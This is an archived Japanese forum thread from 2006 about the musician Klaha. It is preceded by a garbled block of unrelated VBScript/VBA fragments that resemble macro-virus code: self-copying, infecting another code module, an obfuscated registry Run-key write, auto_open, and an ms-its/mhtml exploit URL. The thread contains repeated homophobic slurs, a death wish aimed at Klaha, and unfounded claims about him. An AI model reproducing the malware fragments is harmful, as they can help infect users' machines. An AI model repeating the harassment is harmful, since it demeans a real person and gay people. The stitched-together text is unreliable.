If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"


124 :整理番号774:2006/07/22(土) 14:12:08 ID:yyHfAxS+O
ホモであることは確か

125 :整理番号774:2006/07/22(土) 20:23:11 ID:Z7EP7HyPO
嘘でも本当でもどっちでもいいっけに、ホモネタもうやめない?

いいかげん飽きた。

126 :整理番号774:2006/07/22(土) 21:07:21 ID:V7ryJrRtO
ヴァカだからそれしかネタないんです

127 :整理番号774:2006/07/22(土) 23:00:35 ID:W96pSue60
>>94
蒼天白月好きだ〜。
>>121,122
Marchenの頃の髪型が好き。

128 :整理番号774:2006/07/23(日) 02:43:26 ID:woRbW3jPO
残念ながらホモはまじなんだ

129 :整理番号774:2006/07/23(日) 02:51:28 ID:6qA0sE3JO
ホモがマジだとしても
で?ってかんじなんだけど

130 :整理番号774:2006/07/23(日) 10:17:53 ID:bp0aC4Ya0
>>128
わかったからお前が立てた重複スレに帰ればぁ?

>>129
続きは重複スレでやれ。

131 :整理番号774:2006/07/23(日) 11:06:03 ID:fiF8efDOO
>>129          同感。ついでに粘着サソに一言。Klahaやおかまやゲイも頑張って生きてるんだよ?誰一人侮辱するなよ^^  いつまでもぐだぐだほざいてないで社会貢献の一つでもしてみたらいかが?  貴方がやっている事、はっきり言って単純で幼稚すぎます。

132 :整理番号774:2006/07/23(日) 13:15:32 ID:woRbW3jPO
だったら正直にホモとして生きろクラハ あげ

133 :整理番号774:2006/07/23(日) 13:24:56 ID:bp0aC4Ya0
>>132
だから他でやれっていってるんだよ、池沼が。
ここにクラハがいるわけねーだろ?妄想中のハゲが。ズレてんだよレスが。w

>>131
おまいもいーかげん相手にすんな、学習しろよ・・・・・。



134 :整理番号774:2006/07/23(日) 21:16:06 ID:fiF8efDOO
>>133           反抗期。ごめん…  みんなと純粋にKlahaの話したかったから、そんな話もう聞きたくなかったんだ。でも自分が一番駄目な事してたよ。ごめんね(´;ω;`) 指摘してくれてありがとう。

135 :ちょっとお邪魔しますよ:2006/07/23(日) 21:32:36 ID:yoS92SJr0
ここに張り付いてる厨房は頭弱いみたいですねw
使い古された>>123なんかコピペして、センスのかけらもな(ry・・・w

ウィルスソフトが働いちゃってる皆さんの為に一応貼っときますね。

ノートンの誤動作設定方法
http://ansitu.xrea.jp/guidance/?FAQ2#k863b492
シリア語ブラクラ対策
ttp://d.hatena.ne.jp/na0yuki/20051005#1128471194

136 :整理番号774:2006/07/23(日) 22:18:12 ID:woRbW3jPO
ホモクラハが喚いてますw

137 :整理番号774:2006/07/23(日) 23:56:54 ID:t6tpiNLH0
>>136
よかったな。
自分の貼ったブラクラお陰で
自演出来なくなったのに回避できてww



      つか、お前PCは専ブラだけどなw

138 :整理番号774:2006/07/24(月) 03:23:28 ID:km/RXPrfO
正直、顔ファンに媚びまくってるGacktと並べないでほしい。
まあハイドよりはマシだが。

139 :整理番号774:2006/07/24(月) 05:25:48 ID:KCjJbcTJO
Gacktやhydeに比べたら みじんこにもならないホモインディーズひきこもりうそつき

140 :整理番号774:2006/07/24(月) 10:57:10 ID:RvL794+50



141 :整理番号774:2006/07/24(月) 23:14:32 ID:KCjJbcTJO
さげんなよホモ

142 :整理番号774:2006/07/24(月) 23:31:46 ID:G1wCxLBlO
クラハはホモちゃいます。
薔薇族復刊は関係おまへん。

143 :整理番号774:2006/07/24(月) 23:52:57 ID:fV0Wf6AoO
薔薇族にそんな意味あったなんて知った時びっくりしたなぁ‥やっぱ蔵に似合うのは白薔薇だろ?w

144 :整理番号774:2006/07/25(火) 00:47:38 ID:cH9r8mxo0
でも白バラはオスカルなんだよねー。

私はフェルゼン派ですが。

145 :整理番号774:2006/07/25(火) 01:58:53 ID:2SGRZOEGO
クラハがギター弾くのってどの曲なん?

146 :整理番号774:2006/07/25(火) 02:21:20 ID:MyXuA2K2O
>>145
ファンの子のパンチラ覗きながらに決まってんだろ

147 :整理番号774:2006/07/25(火) 02:35:01 ID:XnX+VQmLO
>>144サソ         そだったね!!ごめんw私はオスカル様だ!しかしどちらも捨てがたい―!ww   >>145サソ         ごめんね‥CD実家だ(´・ω・`)誰か代わり頼みます!

148 :整理番号774:2006/07/25(火) 03:36:00 ID:qD91ZryYO
クラハもホモってるけどおまえらっても二人しかおらないが 終わってる。嫁にでもいけ。

149 :整理番号774:2006/07/25(火) 08:09:28 ID:446cCvd20
>おらないが

そのナマリ、どこの田舎?

150 :整理番号774:2006/07/25(火) 15:12:35 ID:DhyaifrL0
コイツ紳士面しておいて、青春プリズムでファンの子のスカートの中覗いてたぞw

151 :整理番号774:2006/07/25(火) 18:53:49 ID:MrXLqiuz0
>147
テンプレ読もうな

>>3
■携帯の人は…
・皆が読みやすいように、適度な改行を。

そして変にスペース空けるのやめれ

152 :整理番号774:2006/07/25(火) 21:13:28 ID:XnX+VQmLO
>>151 ごめん。携帯変えたばかりで上手くいかないんだ‥orz PCからにする。

153 :整理番号774:2006/07/26(水) 23:31:16 ID:WyJLNTCIO
洞吹きは地獄に落ちまっせ。

154 :整理番号774:2006/07/27(木) 01:06:14 ID:Z8IiojV+O
Klahaスレは重複しすぎでちんぽっぽ困ってしまいます

155 :整理番号774:2006/07/27(木) 02:03:57 ID:cuHbBys1O
死んだらええねん ひきこもりホモ

156 :整理番号774:2006/07/27(木) 11:22:31 ID:nCM3Il170



157 :整理番号774:2006/07/27(木) 13:22:27 ID:cuHbBys1O
さげんなホモクラハ

158 :整理番号774:2006/07/27(木) 16:30:04 ID:6XVxxmFK0



159 :整理番号774:2006/07/27(木) 16:50:53 ID:cuHbBys1O
さげんなオカマはるな

160 :整理番号774:2006/07/27(木) 17:54:37 ID:LvW4rbwDO
クラハマジ今何やってんだろう。
帰ってきたときゲイであることを仮眠具アウトしてくれたらおもしろい

161 :整理番号774:2006/07/27(木) 17:55:30 ID:MKvfmj+j0



162 :整理番号774:2006/07/27(木) 21:55:30 ID:cuHbBys1O
↑ クラハおまえもさげるのに必死だなw

163 :整理番号774:2006/07/27(木) 22:34:17 ID:w2PgGDeg0



164 :整理番号774:2006/07/27(木) 23:09:52 ID:cuHbBys1O
ひゃひゃひゃ けつマンコゆるゆるクラハちゃ〜ん

165 :整理番号774:2006/07/27(木) 23:39:15 ID:6VCVPmnyO
はいはいみなさん
放置お願いしますよ

166 :整理番号774:2006/07/28(金) 01:45:50 ID:5fyBFfij0
開き直ってHGのコスプレしてライヴしたらネ申認定

167 :整理番号774:2006/07/28(金) 02:25:27 ID:CTt1PB/yO
はいはいみなさん >165はクラハ本人ですよー

168 :整理番号774:2006/07/28(金) 02:49:20 ID:qqKIym8ZO
sage。

169 :整理番号774:2006/07/28(金) 09:20:08 ID:7yjPywRb0
>>167
>はいはいみなさん

って、おい!wwぷぷっw
自分だけ孤立してんのに、誰に呼びかけてるのか?w
痛すぎる・・切なすぎる・・・アホす(ry

170 :整理番号774:2006/07/28(金) 11:08:24 ID:CTt1PB/yO
↑ おまえがひとりなんだよ、クラハ。ホモであることをかくしてかくして35年間いかに孤独だったか。カムアウトしちゃいな!

171 :整理番号774:2006/07/28(金) 15:02:27 ID:qqKIym8ZO
はいはいスルースルー。

40 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)